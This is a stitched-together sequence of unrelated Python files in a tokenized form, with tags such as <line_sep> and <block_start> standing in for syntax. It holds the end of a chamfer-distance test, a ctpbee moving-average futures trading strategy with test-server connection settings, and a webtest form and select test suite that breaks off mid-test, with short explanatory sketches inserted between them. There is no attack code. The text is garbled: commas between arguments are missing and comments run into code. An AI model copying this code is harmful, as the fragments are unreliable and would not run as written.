points2)<line_sep>loss=torch.sum(dist1)<line_sep>print(loss)<line_sep>loss.backward()<line_sep>print(points1.grad points2.grad)<line_sep>mydist1,mydist2=mydistChamfer(points1 points2)<line_sep>d1=(dist1-mydist1)<power>2<line_sep>d2=(dist2-mydist2)<power>2<line_sep>print(d1 d2)<assert_stmt>(torch.sum(d1)+torch.sum(d2)<l>0.00000001) "chamfer cuda and chamfer normal are not giving the same results"<block_end>test_chamfer()<line_sep>
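Both pairwise_dist and mydistChamfer above rely on the expansion ||x - y||^2 = ||x||^2 + ||y||^2 - 2 x.y; the standalone NumPy check below (independent of the CUDA chamfer extension, using small random inputs) illustrates that construction.

# Illustrative sketch only: verify the squared-distance expansion used above with NumPy.
import numpy as np

x = np.random.rand(4, 3)                    # 4 points in R^3 (toy data)
y = np.random.rand(5, 3)                    # 5 points in R^3 (toy data)
xx = (x * x).sum(axis=1)[:, None]           # ||x_i||^2 as a column vector
yy = (y * y).sum(axis=1)[None, :]           # ||y_j||^2 as a row vector
P = xx + yy - 2 * x @ y.T                   # P[i, j] = ||x_i - y_j||^2
brute = ((x[:, None, :] - y[None, :, :]) ** 2).sum(axis=-1)
assert np.allclose(P, brute)                # matches the brute-force pairwise distances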
<import_from_stmt>ctpbee CtpbeeApi CtpBee<import_from_stmt>ctpbee.constant Offset TradeData Direction<import_from_stmt>ctpbee.indicator.ta_lib ArrayManager<class_stmt>DoubleMaStrategy(CtpbeeApi)<block_start><def_stmt>__init__ self name<block_start>super().__init__(name)<line_sep>self.manager=ArrayManager(100)<line_sep>self.instrument_set=["rb2101.SHFE"]# If the market-data separation option is enabled, incoming data is filtered against the instruments in this set and only the matching quotes are delivered; the set can also be used to subscribe to specific instruments <line_sep>self.buy=0<line_sep>self.sell=0<line_sep>self.slow=60<line_sep>self.fast=30<block_end><def_stmt>on_trade self trade:TradeData<block_start><if_stmt>trade.offset<eq>Offset.OPEN<block_start><if_stmt>trade.direction<eq>Direction.LONG<block_start>self.buy<augadd>trade.volume<block_end><else_stmt><block_start>self.sell<augadd>trade.volume<block_end><block_end><else_stmt><block_start><if_stmt>trade.direction<eq>Direction.LONG<block_start>self.sell<augsub>trade.volume<block_end><else_stmt><block_start>self.buy<augsub>trade.volume<block_end><block_end><block_end><def_stmt>on_bar self bar<block_start>""" """<line_sep>self.manager.add_data(bar)<if_stmt><not>self.manager.inited<block_start><return><block_end>fast_avg=self.manager.sma(self.fast array=<true>)<line_sep>slow_avg=self.manager.sma(self.slow array=<true>)<if_stmt>slow_avg[-2]<l>fast_avg[-2]<and>slow_avg[-1]<ge>fast_avg[-1]<block_start>self.action.cover(bar.close_price self.buy bar)<line_sep>self.action.sell(bar.close_price 3 bar)<block_end><if_stmt>fast_avg[-2]<l>slow_avg[-2]<and>fast_avg[-1]<ge>slow_avg[-1]<block_start>self.action.sell(bar.close_price self.sell bar)<line_sep>self.action.buy(bar.close_price 3 bar)<block_end><block_end><def_stmt>on_tick self tick<block_start><pass><block_end><def_stmt>on_init self init:bool<block_start>print("Initialization succeeded; note that this callback may be triggered twice")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>app=CtpBee("doublema" __name__ refresh=<true>)<line_sep>app.config.from_mapping({"CONNECT_INFO":{"userid":"089131" "password":"<PASSWORD>" "brokerid":"9999" "md_address":"tcp://172.16.17.32:10112" "td_address":"tcp://172.16.17.32:10102" "product_info":"" "appid":"simnow_client_test" "auth_code":"0000000000000000"} "INTERFACE":"ctp" # interface declaration "TD_FUNC":<true> # enable trading "MD_FUNC":<true> "XMIN":[1]})<line_sep>strategy=DoubleMaStrategy("doublema")<line_sep>app.add_extension(strategy)<line_sep>app.start()<block_end>
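The on_bar method above trades on crossovers of a fast and a slow moving average; the self-contained sketch below (plain Python with made-up SMA values, no ctpbee or ArrayManager dependency) spells out the two crossover tests it uses.

# Illustrative sketch only: the two crossover tests from on_bar above, on toy SMA values.
fast_avg = [10.2, 10.6]   # fast SMA at the previous bar and at the current bar (assumed data)
slow_avg = [10.4, 10.5]   # slow SMA at the previous bar and at the current bar (assumed data)

if fast_avg[-2] < slow_avg[-2] and fast_avg[-1] >= slow_avg[-1]:
    print("fast SMA crossed above the slow SMA on this bar")
if slow_avg[-2] < fast_avg[-2] and slow_avg[-1] >= fast_avg[-1]:
    print("fast SMA crossed below the slow SMA on this bar")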
<import_stmt>cgi<import_stmt>os.path<import_stmt>struct<import_stmt>sys<import_stmt>webtest<import_from_stmt>webob Request<import_from_stmt>webtest.debugapp DebugApp<import_from_stmt>webtest.compat to_bytes<import_from_stmt>webtest.forms NoValue Submit Upload<import_from_stmt>tests.compat unittest<import_from_stmt>tests.compat u<class_stmt>TestForms(unittest.TestCase)<block_start><def_stmt>callFUT self filename='form_inputs.html' formid='simple_form'<block_start>dirname=os.path.join(os.path.dirname(__file__) 'html')<line_sep>app=DebugApp(form=os.path.join(dirname filename) show_form=<true>)<line_sep>resp=webtest.TestApp(app).get('/form.html')<line_sep><return>resp.forms[formid]<block_end><def_stmt>test_set_submit_field self<block_start>form=self.callFUT()<line_sep>self.assertRaises(AttributeError form['submit'].value__set 'foo')<block_end><def_stmt>test_button self<block_start>form=self.callFUT()<line_sep>button=form['button']<line_sep>self.assertTrue(isinstance(button Submit) "<button> without type is a submit button")<block_end><def_stmt>test_button_value_if_submitted self<block_start>form=self.callFUT()<line_sep>submit=form['submit']<line_sep>self.assertEqual(submit.value_if_submitted() '' "submit default value is ''")<line_sep>button=form['button']<line_sep>self.assertEqual(button.value_if_submitted() '' "submit default value is ''")<block_end><def_stmt>test_force_select self<block_start>form=self.callFUT()<line_sep>form['select'].force_value('notavalue')<line_sep>form['select'].value__set('value3')<line_sep>self.assertTrue(form['select']._forced_value<is>NoValue "Setting a value after having forced a value should keep a forced"<concat>" state")<line_sep>self.assertEqual(form['select'].value 'value3' "the value should the the one set by value__set")<line_sep>self.assertEqual(form['select'].selectedIndex 2 "the value index should be the one set by value__set")<block_end><def_stmt>test_form_select self<block_start>form=self.callFUT()<line_sep>form.select('select' 'value1')<line_sep>self.assertEqual(form['select'].value 'value1' "when using form.select, the input selected value should be "<concat>"changed")<block_end><def_stmt>test_get_field_by_index self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form['select'] form.get('select' index=0))<block_end><def_stmt>test_get_unknown_field self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form['unknown'].value '')<line_sep>form['unknown'].value='1'<line_sep>self.assertEqual(form['unknown'].value '1')<block_end><def_stmt>test_get_non_exist_fields self<block_start>form=self.callFUT()<line_sep>self.assertRaises(AssertionError form.get 'nonfield')<block_end><def_stmt>test_get_non_exist_fields_with_default self<block_start>form=self.callFUT()<line_sep>value=form.get('nonfield' default=1)<line_sep>self.assertEqual(value 1)<block_end><def_stmt>test_upload_fields self<block_start>form=self.callFUT()<line_sep>fu=webtest.Upload(__file__)<line_sep>form['file']=fu<line_sep>self.assertEqual(form.upload_fields() [['file' __file__]])<block_end><def_stmt>test_repr self<block_start>form=self.callFUT()<line_sep>self.assertTrue(repr(form).startswith('<Form id='))<block_end><def_stmt>test_the_bs_node_must_not_change self<block_start>form=self.callFUT()<line_sep>self.assertEqual(form.text str(form.html))<block_end><def_stmt>test_set_multiple_checkboxes self<block_start>form=self.callFUT(formid='multiple_checkbox_form')<line_sep>form['checkbox']=[10 30]<line_sep>self.assertEqual(form.get('checkbox' index=0).value 
'10')<line_sep>self.assertEqual(form.get('checkbox' index=1).value <none>)<line_sep>self.assertEqual(form.get('checkbox' index=2).value '30')<block_end><def_stmt>test_button_submit self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action')<line_sep>self.assertIn(u("action=deactivate") display display)<block_end><def_stmt>test_button_submit_by_index self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action' index=1)<line_sep>self.assertIn(u("action=activate") display display)<block_end><def_stmt>test_button_submit_by_value self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>display=form.submit('action' value='activate')<line_sep>self.assertIn(u("action=activate") display display)<block_end><def_stmt>test_button_submit_by_value_and_index self<block_start>form=self.callFUT(formid='multiple_buttons_form')<line_sep>self.assertRaises(ValueError form.submit "action" value="activate" index=0)<block_end><block_end><class_stmt>TestResponseFormAttribute(unittest.TestCase)<block_start><def_stmt>callFUT self body<block_start>app=DebugApp(form=to_bytes(body))<line_sep><return>webtest.TestApp(app)<block_end><def_stmt>test_no_form self<block_start>app=self.callFUT('<html><body></body></html>')<line_sep>res=app.get('/form.html')<line_sep>self.assertRaises(TypeError <lambda>:res.form)<block_end><def_stmt>test_too_many_forms self<block_start>app=self.callFUT('<html><body><form></form><form></form></body></html>')<line_sep>res=app.get('/form.html')<line_sep>self.assertRaises(TypeError <lambda>:res.form)<block_end><block_end><class_stmt>TestInput(unittest.TestCase)<block_start><def_stmt>callFUT self filename='form_inputs.html'<block_start>dirname=os.path.join(os.path.dirname(__file__) 'html')<line_sep>app=DebugApp(form=os.path.join(dirname filename) show_form=<true>)<line_sep><return>webtest.TestApp(app)<block_end><def_stmt>test_input self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form['foo'].value 'baz')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'baz')])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value 'bar')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'bar')])<block_end><def_stmt>test_force_radio_input self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms['radio_input_form']<line_sep>form['foo'].force_value('fido')<line_sep>self.assertEqual(form['foo'].value 'fido')<line_sep>self.assertEqual(form.submit_fields() [('foo' 'fido')])<block_end><def_stmt>test_radio_input_order self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['complex_radio_input_form']<line_sep>form['foo'].value='true'<line_sep>self.assertEqual(form['foo'].value 
'true')<line_sep>self.assertEqual(form['foo'].selectedIndex 0)<line_sep>self.assertEqual(form.submit_fields() [('__start__' 'item:mapping') ('foo' 'true') ('__end__' 'item:mapping') ('__start__' 'item:mapping') ('__end__' 'item:mapping')])<line_sep>res=app.get('/form.html')<line_sep>form=res.forms['complex_radio_input_form']<line_sep>self.assertEqual(form['foo'].value 'true')<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form.submit_fields() [('__start__' 'item:mapping') ('__end__' 'item:mapping') ('__start__' 'item:mapping') ('foo' 'true') ('__end__' 'item:mapping')])<block_end><def_stmt>test_input_unicode self<block_start>app=self.callFUT('form_unicode_inputs.html')<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>self.assertEqual(res.charset.lower() 'utf-8')<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertEqual(form['foo'].selectedIndex 1)<line_sep>self.assertEqual(form['foo'].value u('Блок'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Блок'))])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value u('Хармс'))<line_sep>self.assertEqual(form.submit_fields() [('foo' u('Хармс'))])<block_end><def_stmt>test_input_no_default self<block_start>app=self.callFUT('form_inputs_with_defaults.html')<line_sep>res=app.get('/form.html')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertTrue(res.content_type.startswith('text/html'))<line_sep>form=res.forms['text_input_form']<line_sep>self.assertEqual(form['foo'].value '')<line_sep>self.assertEqual(form.submit_fields() [('foo' '')])<line_sep>form=res.forms['radio_input_form']<line_sep>self.assertTrue(form['foo'].value<is><none>)<line_sep>self.assertEqual(form.submit_fields() [])<line_sep>form=res.forms['checkbox_input_form']<line_sep>self.assertTrue(form['foo'].value<is><none>)<line_sep>self.assertEqual(form.submit_fields() [])<line_sep>form=res.forms['password_input_form']<line_sep>self.assertEqual(form['foo'].value '')<line_sep>self.assertEqual(form.submit_fields() [('foo' '')])<block_end><def_stmt>test_textarea_entities self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms.get("textarea_input_form")<line_sep>self.assertEqual(form.get("textarea").value "'foo&bar'")<line_sep>self.assertEqual(form.submit_fields() [('textarea' "'foo&bar'")])<block_end><def_stmt>test_textarea_emptyfirstline self<block_start>app=self.callFUT()<line_sep>res=app.get('/form.html')<line_sep>form=res.forms.get("textarea_emptyline_form")<line_sep>self.assertEqual(form.get("textarea").value "aaa")<line_sep>self.assertEqual(form.submit_fields() [('textarea' "aaa")])<block_end><block_end><class_stmt>TestFormLint(unittest.TestCase)<block_start><def_stmt>test_form_lint self<block_start>form=webtest.Form(<none> '''<form> <input type="text" name="field"/> </form>''')<line_sep>self.assertRaises(AttributeError form.lint)<line_sep>form=webtest.Form(<none> '''<form> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>self.assertRaises(AttributeError 
form.lint)<line_sep>form=webtest.Form(<none> '''<form> <label for="myfield">my field</label> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>form.lint()<line_sep>form=webtest.Form(<none> '''<form> <label class="field" for="myfield" role="r">my field</label> <input type="text" id="myfield" name="field"/> </form>''')<line_sep>form.lint()<block_end><block_end><def_stmt>select_app environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="4">Four</option> <option value="5" selected="selected">Five</option> <option value="6">Six</option> <option value="7">Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple> <option value="8" selected="selected">Eight</option> <option value="9">Nine</option> <option value="10">Ten</option> <option value="11" selected="selected">Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_without_values environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option>Four</option> <option>Five</option> <option>Six</option> <option>Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option>Eight</option> <option selected value="Nine">Nine</option> <option>Ten</option> <option selected>Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_without_default 
environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=to_bytes(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="4">Four</option> <option value="5">Five</option> <option value="6">Six</option> <option value="7">Seven</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option value="8">Eight</option> <option value="9">Nine</option> <option value="10">Ten</option> <option value="11">Eleven</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """)<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=to_bytes(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """%dict(selection=selection select_type=select_type))<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<line_sep><return>[body]<block_end><def_stmt>select_app_unicode environ start_response<block_start>req=Request(environ)<line_sep>status=b"200 OK"<if_stmt>req.method<eq>"GET"<block_start>body=u(""" <html> <head><title>form page</title></head> <body> <form method="POST" id="single_select_form"> <select id="single" name="single"> <option value="ЕКБ">Екатеринбург</option> <option value="МСК" selected="selected">Москва</option> <option value="СПБ">Санкт-Петербург</option> <option value="САМ">Самара</option> </select> <input name="button" type="submit" value="single"> </form> <form method="POST" id="multiple_select_form"> <select id="multiple" name="multiple" multiple="multiple"> <option value="8" selected="selected">Лондон</option> <option value="9">Париж</option> <option value="10">Пекин</option> <option value="11" selected="selected">Бристоль</option> </select> <input name="button" type="submit" value="multiple"> </form> </body> </html> """).encode('utf8')<block_end><else_stmt><block_start>select_type=req.POST.get("button")<if_stmt>select_type<eq>"single"<block_start>selection=req.POST.get("single")<block_end><elif_stmt>select_type<eq>"multiple"<block_start>selection=", ".join(req.POST.getall("multiple"))<block_end>body=(u(""" <html> <head><title>display page</title></head> <body> <p>You submitted the %(select_type)s </p> <p>You selected %(selection)s</p> </body> </html> """)%dict(selection=selection select_type=select_type)).encode('utf8')<block_end>headers=[('Content-Type' 'text/html; charset=utf-8') ('Content-Length' str(len(body)))]<line_sep># PEP 3333 requires native strings: headers=[(str(k) str(v))<for>k,v headers]<line_sep>start_response(status headers)<if_stmt><not>isinstance(body bytes)<block_start><raise>AssertionError('Body is not %s'%bytes)<block_end><return>[body]<block_end><class_stmt>TestSelect(unittest.TestCase)<block_start><def_stmt>test_unicode_select 
self<block_start>app=webtest.TestApp(select_app_unicode)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value u("МСК"))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(u("<p>You selected МСК</p>") display display)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value u("МСК"))<line_sep>single_form.set("single" u("СПБ"))<line_sep>self.assertEqual(single_form["single"].value u("СПБ"))<line_sep>display=single_form.submit("button")<line_sep>self.assertIn(u("<p>You selected СПБ</p>") display display)<block_end><def_stmt>test_single_select self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 5</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>single_form.set("single" "6")<line_sep>self.assertEqual(single_form["single"].value "6")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 6</p>" display display)<line_sep>res=app.get('/')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertRaises(ValueError single_form.select "single" "5" text="Five")<line_sep>self.assertRaises(ValueError single_form.select "single" text="Three")<line_sep>single_form.select("single" text="Seven")<line_sep>self.assertEqual(single_form["single"].value "7")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 7</p>" display display)<block_end><def_stmt>test_single_select_forced_value self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "5")<line_sep>self.assertRaises(ValueError single_form.set "single" "984")<line_sep>single_form["single"].force_value("984")<line_sep>self.assertEqual(single_form["single"].value "984")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 984</p>" display display)<block_end><def_stmt>test_single_select_no_default self<block_start>app=webtest.TestApp(select_app_without_default)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "4")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 4</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 
200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "4")<line_sep>single_form.set("single" 6)<line_sep>self.assertEqual(single_form["single"].value "6")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected 6</p>" display display)<block_end><def_stmt>test_multiple_select self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ['8' '11'] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 8, 11</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["8" "11"] multiple_form["multiple"].value)<line_sep>multiple_form.set("multiple" ["9"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["9"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 9</p>" display display)<line_sep>res=app.get('/')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertRaises(ValueError multiple_form.select_multiple "multiple" ["8" "10"] texts=["Eight" "Ten"])<line_sep>self.assertRaises(ValueError multiple_form.select_multiple "multiple" texts=["Twelve"])<line_sep>multiple_form.select_multiple("multiple" texts=["Eight" "Nine" "Ten"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 8, 9, 10</p>" display display)<block_end><def_stmt>test_multiple_select_forced_values self<block_start>app=webtest.TestApp(select_app)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["8" "11"] multiple_form["multiple"].value)<line_sep>self.assertRaises(ValueError multiple_form.set "multiple" ["24" "88"])<line_sep>multiple_form["multiple"].force_value(["24" "88"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["24" "88"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 24, 88</p>" display display)<block_end><def_stmt>test_multiple_select_no_default self<block_start>app=webtest.TestApp(select_app_without_default)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertTrue(multiple_form["multiple"].value<is><none> repr(multiple_form["multiple"].value))<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You 
selected </p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertTrue(multiple_form["multiple"].value<is><none> multiple_form["multiple"].value)<line_sep>multiple_form.set("multiple" ["9"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["9"] multiple_form["multiple"].value)<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected 9</p>" display display)<block_end><def_stmt>test_select_no_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "Four")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected Four</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>single_form=res.forms["single_select_form"]<line_sep>self.assertEqual(single_form["single"].value "Four")<line_sep>single_form.set("single" "Six")<line_sep>self.assertEqual(single_form["single"].value "Six")<line_sep>display=single_form.submit("button")<line_sep>self.assertIn("<p>You selected Six</p>" display display)<block_end><def_stmt>test_multiple_select_no_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected Nine, Eleven</p>" display display)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep>multiple_form.set("multiple" ["Nine" "Ten"])<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Ten"])<line_sep>display=multiple_form.submit("button")<line_sep>self.assertIn("<p>You selected Nine, Ten</p>" display display)<block_end><def_stmt>test_multiple_select_reset_value self<block_start>app=webtest.TestApp(select_app_without_values)<line_sep>res=app.get('/')<line_sep>self.assertEqual(res.status_int 200)<line_sep>self.assertEqual(res.headers['content-type'] 'text/html; charset=utf-8')<line_sep>self.assertEqual(res.content_type 'text/html')<line_sep>multiple_form=res.forms["multiple_select_form"]<line_sep>self.assertEqual(multiple_form["multiple"].value ["Nine" "Eleven"])<line_sep># reset with value multiple_form["multiple"].value=[]<line_sep>self.assertIsNone(multiple_form["multiple"].value)<line_sep># re-set a value 
